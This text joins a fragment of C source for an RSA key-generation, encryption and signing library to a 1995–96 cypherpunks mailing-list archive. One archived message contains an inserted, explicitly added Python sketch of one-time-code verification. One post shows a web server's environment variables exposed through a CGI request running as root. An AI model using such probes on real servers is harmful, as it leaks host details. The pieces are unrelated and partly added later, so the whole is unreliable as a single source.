  BigInt e, n;
#else
_TYPE( RSAPublicKey * ) buildRSAPublicKey(BigInt e,
					  BigInt n)
#endif
{
	RSAPublicKey *pk;
#ifdef DLLEXPORT
	HGLOBAL handle = clib_malloc(sizeof(RSAPublicKey));
	pk = (RSAPublicKey *)GlobalLock(handle);
	pk->pubkey_handle = handle;
#else
	pk = (RSAPublicKey *)clib_malloc(sizeof(RSAPublicKey));
#endif
	pk->publicExponent = e;
	pk->modulus = n;
	return pk;
}

#ifdef K_AND_R
_TYPE( RSAPrivateKey * )
buildRSAPrivateKey(e, d, p, q, dp, dq, c12)
  BigInt e, d, p, q, dp, dq, c12;
#else
_TYPE( RSAPrivateKey * ) buildRSAPrivateKey(BigInt e,
					    BigInt d,
					    BigInt p,
					    BigInt q,
					    BigInt dp,
					    BigInt dq,
					    BigInt c12)
#endif
{
	RSAPrivateKey *pk;
	ChineseRemStruct *crt;
#ifdef DLLEXPORT
	HGLOBAL crt_handle = clib_malloc(sizeof(ChineseRemStruct));
	HGLOBAL handle = clib_malloc(sizeof(RSAPrivateKey));
	crt = (ChineseRemStruct *)GlobalLock(crt_handle);
	crt->crt_handle = crt_handle;
	pk = (RSAPrivateKey *)GlobalLock(handle);
	pk->privkey_handle = handle;
#else
	crt = (ChineseRemStruct *)clib_malloc(sizeof(ChineseRemStruct));
	pk = (RSAPrivateKey *)clib_malloc(sizeof(RSAPrivateKey));
#endif
	
	pk->publicExponent = e;
	pk->privateExponent = d;
	pk->modulus = bigInit(0);
	bigMultiply(p, q, pk->modulus);
	
	pk->crt = crt;
	pk->crt->p = p;
	pk->crt->q = q;
	pk->crt->dp = dp;
	pk->crt->dq = dq;
	pk->crt->c12 = c12;
	
	return pk;
}

#ifdef K_AND_R
_TYPE( RSAKeySet * )
buildRSAKeySet(e, d, p, q)
  BigInt e, d, p, q;
#else
_TYPE( RSAKeySet * ) buildRSAKeySet(BigInt e,
				    BigInt d,
				    BigInt p,
				    BigInt q)
#endif
{
	BigInt pminus1, qminus1, n, dp, dq, c12;
	BigInt ecopy, dcopy;
	RSAKeySet *ks;
#ifdef DLLEXPORT
	HGLOBAL ks_handle = clib_malloc(sizeof(RSAKeySet));
	ks = (RSAKeySet *)GlobalLock(ks_handle);
	ks->keyset_handle = ks_handle;
#else
	ks = (RSAKeySet *)clib_malloc(sizeof(RSAKeySet));
#endif
	n = bigInit(0);
	bigMultiply(p, q, n);
	
	ecopy = bigInit(0);
	bigCopy(e, ecopy);
	ks->publicKey = buildRSAPublicKey(ecopy, n);
	
	pminus1 = bigInit(0);
	qminus1 = bigInit(0);
	bigSubtract(p, one, pminus1);
	bigSubtract(q, one, qminus1);
	
	dp = bigInit(0);
	dq = bigInit(0);
	bigMod(d, pminus1, dp);
	bigMod(d, qminus1, dq);
	
	c12 = bigInit(0);
	getInverse(q, p, c12);

	ecopy = bigInit(0);
	bigCopy(e, ecopy);
	dcopy = bigInit(0);
	bigCopy(d, dcopy);
	ks->privateKey = buildRSAPrivateKey(ecopy, dcopy, p, q,
					    dp, dq, c12);
	
	freeBignum(pminus1);
	freeBignum(qminus1);
	
	return ks;
}


#ifdef K_AND_R
static void
genPrimesFor3(nbits, p, q, r1, r2)
  int nbits;
  BigInt p, q, r1, r2;
#else
  static void genPrimesFor3(int nbits,
			    BigInt p,
			    BigInt q,
			    BigInt r1,
			    BigInt r2)
#endif
{
	BigInt ngcd, ignore, three, pminus1, qminus1;
	
	ignore = bigInit(0);
	three = bigInit(3);
	pminus1 = bigInit(0);
	qminus1 = bigInit(0);

	/* Gordon algorithm doesn't care about the p-1 factor size */
	genStrongPrimeSet(nbits/2, p, (int)NULL, ignore, GORDON, r1);
	bigSubtract(p, one, pminus1);
	ngcd = gcd(three, pminus1);
	while (bigCompare(ngcd, one) != 0) {
		if (r1 != NULL)
			randomize(r1);
		freeBignum(ngcd);
		genStrongPrimeSet(nbits/2, p, (int)NULL, ignore, GORDON, r1);
		bigSubtract(p, one, pminus1);
		ngcd = gcd(three, pminus1);
	}
	freeBignum(ngcd);
	
	genStrongPrimeSet(nbits/2, q, (int)NULL, ignore, GORDON, r2);
	bigSubtract(q, one, qminus1);
	ngcd = gcd(three, qminus1);
	while (bigCompare(ngcd, one) != 0) {
		if (r2 != NULL)
			randomize(r2);
		freeBignum(ngcd);
		genStrongPrimeSet(nbits/2, q, (int)NULL, ignore, GORDON, r2);
		bigSubtract(q, one, qminus1);
		ngcd = gcd(three, qminus1);
	}
	freeBignum(ngcd);
	freeBignum(pminus1);
	freeBignum(qminus1);
	freeBignum(ignore);
	freeBignum(three);
}


#ifdef K_AND_R
_TYPE( int )
randBytesNeededForRSA (modlen, ebits)
  int modlen, ebits;
#else
_TYPE( int ) randBytesNeededForRSA (int modlen, int ebits)
#endif
{
	int bytes;

	bytes = ((modlen + ebits)/8) + ((modlen+ebits)%8? 1: 0);

	return bytes;
}

#ifdef K_AND_R
_TYPE( RSAKeySet * )
genRSAKeySet(nbits, ebits, e, randomStart)
  int nbits, ebits;
  BigInt e, randomStart;	/* types now match the ANSI prototype */
#else
_TYPE( RSAKeySet * ) genRSAKeySet(int nbits,
				  int ebits,
				  BigInt e,
				  BigInt randomStart)
#endif
{
	BigInt p, q, ignore, r1, r2;
	Key_exps *exps;
	RSAKeySet *key_set;
	int oldlen;
	BigInt randStart;
	
	p = bigInit(0);
	q = bigInit(0);
	r1 = NULL;
	r2 = NULL;
	randStart = NULL;
	if (randomStart != NULL) {
		r1 = bigInit(0);
		r2 = bigInit(0);
		randStart = bigInit(0);
		bigCopy(randomStart, randStart);
		oldlen = LENGTH(randStart);
		LENGTH(randStart) = nbits/32/2;
		bigCopy(randStart, r1);
		LENGTH(randStart) = oldlen;
		bigRightShift(randStart, nbits/2, randStart);
		oldlen = LENGTH(randStart);
		LENGTH(randStart) = nbits/32/2;
		bigCopy(randStart, r2);
		LENGTH(randStart) = oldlen;
		bigRightShift(randStart, nbits/2, randStart);
	}
	if (ebits == 2)
		genPrimesFor3(nbits, p, q, r1, r2);
	
	else {
		ignore = bigInit(0);
		genStrongPrimeSet(nbits/2, p, (int)NULL, ignore, GORDON, r1);
		genStrongPrimeSet(nbits/2, q, (int)NULL, ignore, GORDON, r2);
		freeBignum(ignore);
	}
	exps = genKeyExps(p, q, e, ebits, randStart);
	key_set = buildRSAKeySet(exps->e, exps->d, p, q);
	freeBignum(exps->e);
	freeBignum(exps->d);
	if (r1 != NULL) {
		freeBignum(r1);
		freeBignum(r2);
		freeBignum(randStart);
	}
#ifdef DLLEXPORT
	GlobalUnlock(exps->exp_handle);
	GlobalFree(exps->exp_handle);
#else
	free((char *)exps);
#endif
	return key_set;
}


/*
   Chinese Remainder Theorem reconstruction of m^d mod n, using
   m^dp mod p and m^dq mod q with dp = d mod p-1, dq = d mod q-1.
   */
#ifdef K_AND_R
static void
chineseRemTheorem(m, key, em)
  BigInt m, em;
  RSAPrivateKey *key;
#else
  static void chineseRemTheorem(BigInt m,
				RSAPrivateKey *key,
				BigInt em)
#endif
{
	BigInt u1, u2;
	BigInt p, q, dp, dq, c12;
	
	p = key->crt->p;
	q = key->crt->q;
	dp = key->crt->dp;
	dq = key->crt->dq;
	c12 = key->crt->c12;
	
	u1 = bigInit(0);
	u2 = bigInit(0);

	bigPow(m, dp, p, u1);
	bigPow(m, dq, q, u2);
	
	crtCombine(u1, u2, p, q, c12, em);
	
	freeBignum(u1);
	freeBignum(u2);
	
}

#ifdef K_AND_R
_TYPE( void )
freeRSAPublicKey(pk)
  RSAPublicKey *pk;
#else
_TYPE( void ) freeRSAPublicKey(RSAPublicKey *pk)
#endif
{
	freeBignum(pk->publicExponent);
	freeBignum(pk->modulus);
#ifdef DLLEXPORT
	GlobalUnlock(pk->pubkey_handle);
	GlobalFree(pk->pubkey_handle);
#else
	free((char *)pk);
#endif
}

#ifdef K_AND_R
_TYPE( void )
freeRSAPrivateKey(pk)
  RSAPrivateKey *pk;
#else
_TYPE( void ) freeRSAPrivateKey(RSAPrivateKey *pk)
#endif
{
	freeBignum(pk->publicExponent);
	freeBignum(pk->privateExponent);
	freeBignum(pk->modulus);
	freeBignum(pk->crt->p);
	freeBignum(pk->crt->q);
	freeBignum(pk->crt->dp);
	freeBignum(pk->crt->dq);
	freeBignum(pk->crt->c12);
#ifdef DLLEXPORT
	GlobalUnlock(pk->crt->crt_handle);
	GlobalFree(pk->crt->crt_handle);
	GlobalUnlock(pk->privkey_handle);
	GlobalFree(pk->privkey_handle);
#else
	free((char *)pk->crt);
	free((char *)pk);
#endif	
}

#ifdef K_AND_R
_TYPE( void )
freeRSAKeys(ks)
  RSAKeySet *ks;
#else
_TYPE( void ) freeRSAKeys(RSAKeySet *ks)
#endif
{
	
	freeRSAPublicKey(ks->publicKey);
	freeRSAPrivateKey(ks->privateKey);
#ifdef DLLEXPORT
	GlobalUnlock(ks->keyset_handle);
	GlobalFree(ks->keyset_handle);
#else
	free((char *)ks);
#endif
}

#ifdef K_AND_R
_TYPE( BigInt )
RSAEncrypt(message, key)
  BigInt message;
  RSAPublicKey *key;
#else
_TYPE( BigInt ) RSAEncrypt(BigInt message,
			   RSAPublicKey *key)
#endif
{
	BigInt result;
	
	result = bigInit(3);
	if (bigCompare(key->publicExponent, result) == 0) {
		reset_big(result, 0);
		bigCube(message, key->modulus, result);
	}
	else {
		reset_big(result, 0);
		bigPow(message, key->publicExponent, key->modulus, result);
	}
	return result;
}

#ifdef K_AND_R
_TYPE( BigInt )
RSADecrypt(message, key)
  BigInt message;
  RSAPrivateKey *key;
#else
_TYPE( BigInt ) RSADecrypt(BigInt message,
			   RSAPrivateKey *key)
#endif
{
	BigInt result;
	
	result = bigInit(0);
	
	chineseRemTheorem(message, key, result);
	return result;
	
}


#ifdef K_AND_R
_TYPE( RSASignature * )
RSASign(message, key)
  BigInt message;
  RSAPrivateKey *key;
#else
_TYPE( RSASignature * ) RSASign(BigInt message,
				RSAPrivateKey *key)
#endif
{
	return (RSASignature *)RSADecrypt(message, key);
}


#ifdef K_AND_R
_TYPE( Boolean )
RSAVerify(message, sig, key)
  BigInt message;
  RSASignature *sig;
  RSAPublicKey *key;
#else
_TYPE( Boolean ) RSAVerify(BigInt message,
			   RSASignature *sig,
			   RSAPublicKey *key)
#endif
{
	Boolean retval;
	BigInt cmp;
	
	cmp = (BigInt)RSAEncrypt((BigInt)sig, key);
	
	if (bigCompare(message, cmp) == 0)
		retval = TRUE;
	else
		retval = FALSE;
	
	freeBignum(cmp);
	
	return retval;
}

#ifdef K_AND_R
_TYPE( void )
freeRSASig(sig)
  RSASignature *sig;
#else
_TYPE( void ) freeRSASig(RSASignature *sig)
#endif
{
	freeBignum((BigInt)sig);
}

#ifdef K_AND_R
_TYPE( void )
RSAPrivateKeyDesEncrypt(pk, deskey)
  RSAPrivateKey *pk;
  unsigned char *deskey;
#else
_TYPE( void )
RSAPrivateKeyDesEncrypt(RSAPrivateKey *pk, unsigned char *deskey)
#endif
{
	bignumDesEncrypt(pk->publicExponent, deskey);
	bignumDesEncrypt(pk->privateExponent, deskey);
	bignumDesEncrypt(pk->modulus, deskey);
	bignumDesEncrypt(pk->crt->p, deskey);
	bignumDesEncrypt(pk->crt->q, deskey);
	bignumDesEncrypt(pk->crt->dp, deskey);
	bignumDesEncrypt(pk->crt->dq, deskey);
	bignumDesEncrypt(pk->crt->c12, deskey);
}

#ifdef K_AND_R
_TYPE( void )
RSAPrivateKeyDesDecrypt(pk, deskey)
  RSAPrivateKey *pk;
  unsigned char *deskey;
#else
_TYPE( void )
RSAPrivateKeyDesDecrypt(RSAPrivateKey *pk, unsigned char *deskey)
#endif
{
	bignumDesDecrypt(pk->publicExponent, deskey);
	bignumDesDecrypt(pk->privateExponent, deskey);
	bignumDesDecrypt(pk->modulus, deskey);
	bignumDesDecrypt(pk->crt->p, deskey);
	bignumDesDecrypt(pk->crt->q, deskey);
	bignumDesDecrypt(pk->crt->dp, deskey);
	bignumDesDecrypt(pk->crt->dq, deskey);
	bignumDesDecrypt(pk->crt->c12, deskey);
}

#ifdef K_AND_R
_TYPE( BigInt )
quantized_RSADecrypt(m, key)
  BigInt m;
  RSAPrivateKey *key;
#else
_TYPE( BigInt )
quantized_RSADecrypt(BigInt m, RSAPrivateKey *key)
#endif
{
	BigInt result;

	start_quantize(STD_QUANTUM);
	result = RSADecrypt(m, key);
	end_quantize();

	return result;
}


#ifdef K_AND_R
_TYPE( RSASignature *)
quantized_RSASign(m, key)
  BigInt m;
  RSAPrivateKey *key;
#else
_TYPE( RSASignature *)
quantized_RSASign(BigInt m, RSAPrivateKey *key)
#endif
{
	return (RSASignature *)quantized_RSADecrypt(m, key);
}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 28 Dec 95 10:11:43 PST
To: cypherpunks@toad.com
Subject: Premail web server strangeness
Message-ID: <199512281811.FAA20893@suburbia.net>
MIME-Version: 1.0
Content-Type: text


Surprising amount of information one can gain from an env array, really.
....


                                                               SORRY


DISPLAY=callisto:0.0
EDITOR=/usr/sww/bin/emacsclient
HOME=/
HOST=kiwi.cs.berkeley.edu
HOSTTYPE=alpha
LOGNAME=root
LPDEST=lws510
MACHTYPE=alpha
MAIL=/var/spool/mail/raph
MANPATH=/private/raph/man:/usr/kerberos/man:/usr/sww/man:/usr/sww/X11/man:/usr/man:/usr/local/man
MITSCHEME_LIBRARY_PATH=/usr2/fa92/c263/scheme/lib
MPL=CMMD
NNTPSERVER=agate
OSTYPE=osf1
PAGER=/usr/sww/bin/less -r
PATH=/usr/bin:/usr/sww/bin
PGPPATH=/private/raph/.pgp
PRINTER=lws510
PWD=/private/raph
REMOTEHOST=callisto.HIP.Berkeley.EDU
SHELL=/bin/sh
SHLVL=2
TERM=xterm
USER=root
VENDOR=dec
SERVER_SOFTWARE=Raph's li'l server 0.04
HTTP_ACCEPT=application/x-csh
HTTP_FROM=
HTTP_REFERER=http://kiwi.cs.berkeley.edu/cgi-bin/premail-0.42.tar.gz?question1=Yes&question2=Yes
HTTP_USER_AGENT=
QUERY_STRING=question1=Yes&question2=Yes



   Sorry, can't serve the document.

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  has stood still, who built the largest |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 30 Dec 95 12:30:22 PST
To: cypherpunks@toad.com
Subject: Re: last straw
In-Reply-To: <v0300420cad0afe0c22d7@[129.46.82.92]>
Message-ID: <D7kXgD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Del Torto <ddt@lsd.com> writes:
> I've decided to cancel my CrampuNerve account and send the weasels a msg
> telling them why. I encourage everyone here to do the same with your CI$
> account (if you still have one). These [insert colorful expletive here]s
> only understand one thing: cold ca$h. Thus, the only effective way to send
> them an indication of one's displeasure at their poor precedent-setting is
> to vote with one's wallet.

One could go one step further -- use free trial accounts to go to their
local boards and chat rooms and tell the truth, urging others to leave.

By the way, Cantor & Siegal were long-time CompuServe users before spamming
Usenet with their green card ad.

> Any who are still unfortunate enough to rely on CI$ for Internet/Usenet
> access are getting reamed price-wise anyway, not to mention suffering poor
> reliability and now access, so maybe a few of them could also take this
> opportunity to migrate to an ISP with some real "backbone."

A friend of mine tried to use CS to read Usenet and reported the following:

* There's a very small limit on the size of an article to post to Usenet;

* There's a tremendous delay before Usenet articles pass through their
gateway;

* He saw many articles at other sites that never made it to CS; he estimated
that about 30-50% of Usenet articles just never get thru;

* The expiration in many high-volume newsgroups is 3 days or less.

(I don't know how true this is; his impressions may be wrong.)

When he complained to CS about it, he was told that CS doesn't position itself
as an Internet service provider. They have a lot of proprietary content that's
not available via the internet. They don't expect people to use their services
to use Usenet or Internet e-mail.

And now comes the *point*:

There's much information on CompuServe that cannot be accessed from the outside.
One example is the very informative National Computer Security Association's
forum. I think it would be a fitting response if NCSA removed their forum
from CS. (There are other such for-pay forums, like SovSet', which can be
accessed from the internet without paying anything to CompuServe).

As it stands, there are people who will maintain their CS accounts to access
the NCSA forum (even though they find CS's actions repugnant). If you don't
like it, encourage the NCSA to move their forum elsewhere.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Sun, 31 Dec 95 03:58:09 PST
To: Michael Handler <grendel@netaxs.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
In-Reply-To: <Pine.SUN.3.91.951229220043.25326A-100000@unix5.netaxs.com>
Message-ID: <9512311156.AA00347@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


you said:
|On Fri, 29 Dec 1995, Timothy C. May wrote:
|
|> Wow! I am watching the CEO of Compuserve being interviewed on CNBC,
|> explaining how his company is "taking the high road by complying with the
|> laws of Germany" in removing access to 200 Usenet groups.
|
|A blatant lie.
|

How this could ever be construed as "the high road" is beyond me.
Censorship and fascism tend to go hand in hand, I suppose it should
be no surprise to see this coming from de-dom.

Can we just start calling them CompuCensor instead of Compuserve?

Tim


________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
tfs@epic.org                (PGP key aval.)  crypto is good
Digital Encryption Systems Inc.             I own my own words





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Dec 95 05:40:15 PST
To: cypherpunks@toad.com
Subject: Re: anon.penet addresses in .sigs
In-Reply-To: <199512311100.GAA18408@thor.cs.umass.edu>
Message-ID: <Ty7ygD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


futplex@pseudonym.com (Futplex) writes:
> The direct address is easier to use, especially for people whose mailers
> don't allow them to add arbitrary email headers. Note that the ratio of

I recall that anon.penet.fi can be used by those whose mailers don't allow
them to add new headers -- the extra headers can be placed in at the top
of the body and it'll recognize them.  Likewise cypherpunk remailers let
you add headers with ##. I've taught at least one extremely "non-technical"
user to use the cypherpunks remailers successfully.

> users of the various cypherpunk remailers to users of anon.penet is even
> lower than the S/N ratio on this list in December.

Like, negative????? :)

> In certain parts of Usenet, many people routinely advertise addresses at
> anon.penet (and similar services) in their .sigs (as Ed does) to make
> pseudonymized replies as convenient as possible. This is not a new phenomenon

My question was "why". I think I see the answer now.  Thank you.

Happy New Year!

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve14571@aol.com
Date: Sun, 31 Dec 95 06:15:34 PST
To: cypherpunks@toad.com
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <951231091526_102864093@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 95-12-30 21:34:12 EST, accessnt@ozemail.com.au (Mark
Neely) wrote:

> I assume that C$ is only filtering the newsfeed as it hits German shores?
> Please tell me they aren't denying access to these "banned" newsgroups for
> all users worldwide!

This is exactly what they are doing, Mr. Neely.  I am not familiar with
CompuServe, as I have never used it.  However, based on my understanding of
how Usenet operates, it would be possible to write software and incorporate
it into CompuServe software that would block German readers from the
"obscene" newsgroups.  CompuServe would rather score points with the mostly
ignorant general public by saying that they are becoming more
"family-oriented."

I get my access through America Online, and I am afraid that these monolith
online services (AOL, Delphi, Prodigy) will follow C$'s lead so they may also
say they are "family-oriented."

I will no longer send mail to addresses that end with "compuserve.com."  If
AOL decides to become family oriented, I will look for other ways to connect
to the net.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 31 Dec 95 06:49:51 PST
To: cypherpunks@toad.com
Subject: Compuserve *hasn't* banned newsgroups
Message-ID: <2.2.32.19951231145010.008c9658@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


So I'd heard that CompuServe had banned access to all those naughty
newsgroups including my favorite alt.binaries.erotic.senior-citizens.  Could
this be true?  I fired up my CompuServe Internet Dialer (the PPP software
packaged with WinCim) and logged on to the nets.  Sure enough.  The popular
binaries groups were missing from news.compuserve.com.  But not to be
deterred...

I grabbed a copy of the Free Agent newsreader:

http://www2.interpath.net/forte/agent/freagent.htm

ftp.forteinc.com/pub/free_agent/fagent10.zip

I grabbed the latest list of open NNTP Servers from:

http://dana.ucc.nau.edu/~jwa/open-sites.html

I pointed my copy of Free Agent at CPCNET's open news server (198.70.185.5)
and grabbed a list of groups.  Sure enough, there were the seasoned citizens
in all their glory.  And I was checking out those binaries via CompuServe.

Don't tell the Bavarians. 

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 31 Dec 95 07:14:17 PST
To: Alan.Pugh@internetMCI.COM (amp)
Subject: Re: Australian "calculatorcard"
In-Reply-To: <01HZFQH4O0R695OXTW@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199512311459.JAA00430@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> sounds like the card i use for remote dialup to certain non-public
> systems i use at work. it has a six digit number on the front that
> changes every 60 seconds. 

Do these card systems use a window to handle clock-slip?

I'd think you could have the server safely accept # N, N-60 sec, and
N+60 seconds; and adjust the server's idea of your card's clock speed
from that.

What new risk would that create?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433
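
The windowed check asked about above, as an added sketch that is not part of the message or of any card vendor's product: the server accepts the code for step N-1, N or N+1, folds the observed offset into a per-card drift, and refuses any step at or below the last one it accepted. The HMAC-SHA1 truncation stands in for the card's algorithm, which the thread does not give; CardRecord, its fields and the key are assumptions.

```python
import hashlib
import hmac
import struct

STEP = 60      # seconds per displayed code, as in the quoted description
DIGITS = 6     # six-digit display, as in the quoted description


def card_code(key: bytes, step: int) -> str:
    """Stand-in generator (assumption): HMAC-SHA1 of the step, truncated."""
    mac = hmac.new(key, struct.pack(">Q", step), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    val = struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF
    return str(val % 10 ** DIGITS).zfill(DIGITS)


class CardRecord:
    """Server-side state for one card (hypothetical structure)."""

    def __init__(self, key: bytes, window: int = 1):
        self.key = key
        self.window = window    # accept steps N-window .. N+window
        self.drift = 0          # learned card-clock offset, in steps
        self.last_step = -1     # highest step already accepted

    def verify(self, code: str, server_time: int) -> bool:
        """Accept a code inside the window, learn drift, refuse reuse."""
        center = server_time // STEP + self.drift
        # Try the expected step first, then its neighbours.
        for delta in sorted(range(-self.window, self.window + 1), key=abs):
            step = center + delta
            if step <= self.last_step:
                continue        # already used, or older than a used code
            expected = card_code(self.key, step)
            if hmac.compare_digest(expected.encode(), code.encode()):
                self.last_step = step
                self.drift += delta
                return True
        return False


if __name__ == "__main__":
    key = b"constructed-demo-key"            # constructed sample secret
    rec = CardRecord(key)
    fast = card_code(key, 101)               # card runs one step fast
    print("fast card accepted:", rec.verify(fast, 6000))    # server step 100
    print("same code replayed:", rec.verify(fast, 6030))
    print("learned drift     :", rec.drift)
    print("five steps off    :", rec.verify(card_code(key, 205), 12000))

    # The cost of the window: a code read off the display at step 100 but
    # never submitted is still accepted during step 101, and it drags the
    # stored drift backwards.
    late = CardRecord(key, window=1)
    print("stale code, window=1:", late.verify(card_code(key, 100), 6060))
    print("drift pulled to     :", late.drift)
    strict = CardRecord(key, window=0)
    print("stale code, window=0:", strict.verify(card_code(key, 100), 6060))
```

Each extra accepted step lengthens the time an observed but unused code stays valid, which is why the window is kept small and every accepted step is recorded.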



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 31 Dec 95 07:18:17 PST
To: cypherpunks@toad.com
Subject: SEY_use
Message-ID: <199512311518.KAA19667@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-31-95. WashP:

   Emulating US founding outlaws, the Seychelles government
   has enacted an investment law described by transatlantic
   neo-imperialists as a "Welcome, Criminals" act. The law
   offers anyone who invests $10 million or more in Seychelles
   -- no questions asked as to the source -- protection from
   extradition, from seizure of assets and to other
   "concessions and incentives commensurate with the
   investment." Neo-imps say this is "an open invitation to
   money launderers and other international criminals to set
   up shop with impunity." Under the statute the Seychelles
   government could grant diplomatic passports and other
   protections as a shield from thermonuclear pornography.

   SEY_use












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an5877@anon.penet.fi (deadbeat)
Date: Sun, 31 Dec 95 09:10:48 PST
To: cypherpunks@toad.com
Subject: Fred Cohen, PhD
Message-ID: <9512311704.AA03856@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Regarding Fred Cohen, PhD:

Cohen's haughty and bombastic style do nothing good for his reputation.  I
assume he advertises his PhD to highlight his early accomplishments; he has
done little since.

Let's also consider the granting institution, a second-rank school.

Cohen's thesis broke new ground, but how many people have read it, or any of
his writings, or know anything about his ideas beyond a single word?  How far
did he carry this work?  Where are the conference and journal papers?  Cohen's
reputation faded into obscurity long ago.  Now he is building a new reputation
as a pig-headed loudmouth, threatening his "defamers."  Shades of Sternlight.

DEADBEAT <na5877@anon.penet.fi>

-----BEGIN PGP SIGNATURE-----
Version: 2.4

iQBFAgUBMOa9TPFZTpBW/B35AQFLQQGAmzB8o+g5k3mYmzMmk3JiDTBf+P8dSFZY
25IwVISjSV7o95vgbmNWAy/3zVY50AKn
=SfU6
-----END PGP SIGNATURE-----
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pyro Teknik" <pyro-teknik@mail.geocities.com>
Date: Thu, 5 Dec 1996 09:36:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Travelling With Laptops/PGP
Message-ID: <199612051730.JAA17379@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


> Problem:
> 
> I will be spending a couple of months chilling out in Barcelona, Spain.
> I will have a local Internet account/dial-up in that city, and will use 
> it to telnet into my various US-based accounts. This is how I plan to 
> keep in touch with various people while I am gone.
> 
> Questions:
> 
> 1 - Is the importation of two laptops and it's various peripheral devices 
> by a US citizen into Spain going to be a problem? I know it is in some 
> European countries.
> 
> 2 - Will having PGP 2.6.2, with 2048-bit keys, or any key length for this 
> matter, installed on these two machines, cause a problem?
> 
> Would this be a viable workaround? Or should I just say fuck it, and just 
> disavow myself of any reason/need for PGP for the duration of my stay? If 
> this is gonna be a problem, I'll just forego anything requiring 
> encryption while I am in Spain.

I walked straight through British, Dutch and Maltese Customs at the 
respective airports and they didn't even ask what was in the bag, let 
alone what software. I had PGP and a huge keyring stored on my hard 
drive and they were none the wiser.

> I have no interest in smuggling crypto in, or defying international law 
> just to use PGP for personal use. If it's not allowed, I simply won't use 
> it. But, I MUST be able to bring my laptops into the country. That HAS to 
> happen.

I'd suggest lugging them through as hand luggage. If you are 
worried, zip up pgp and so on with a password - if customs do check, 
they aren't gonna waste breaking the zip password (even though it can 
be done quickly)

Also, I think the law may be different, as you are an American Citizen 
using your own equipment...


 
[*]-------------------------------------------[*]----------------[*]
[*] Pyro Teknik - <pyro-teknik@geocities.com> [*]   Linux Guru   [*]
[*] www.geocities.com/SunsetStrip/Alley/7705/ [*] Phone Phreaker [*]
[*]-------------------------------------------[*]----------------[*]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Fri, 1 Dec 95 03:48:51 PST
To: fletch@ain.bls.com
Subject: Re: VisaCash security.
Message-ID: <95Dec1.124621gmt+0100.53761@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




<fletch@ain.bls.com> wrote:

>        I think the Visa stuff is basically stored value and
>rechargeable smart cards, not really ecash type money.  Supposedly
>you'll be able to get a card with $10 or $20 on it and all the
>vending machines and phones around the Olympic venues will be set
>up to take the cards.  So to answer your questions, no it's not really
>digital cash (like ecash); and yes I think it's probably traceable
>to some extent (unless you buy stored value cards w/paper cash).
>
>        First Union, the bank selling the cards, has a page on them:
>
>http://www.firstunion.com/visacash/
>
>        Low on the technical info, but they give an address to mail
>questions to.

A couple of weeks ago I was giving a talk at a conference on
computer technology in financial applications in Stockholm.
I mentioned VISA's electronic purse 'Smart Cash' in my talk
and during the break afterwards a representative from a Danish
bank told me that VISA's 'Smart Cash' was actually bought from
the Danish purse/project 'Danmont'. If anyone knows the truth
of this, please let me know.

Regards,
/Lars Johansson
ljo@ausys.se





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ROCK.CNB.UAM.ES
Date: Fri, 1 Dec 95 03:59:20 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <951201140557.20a03b98@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


From:	SMTP%"tcmay@got.net"  1-DEC-1995 12:26:55.99

>With the assumption that this is not a troll, and giving the writer some

	No, it isn't.

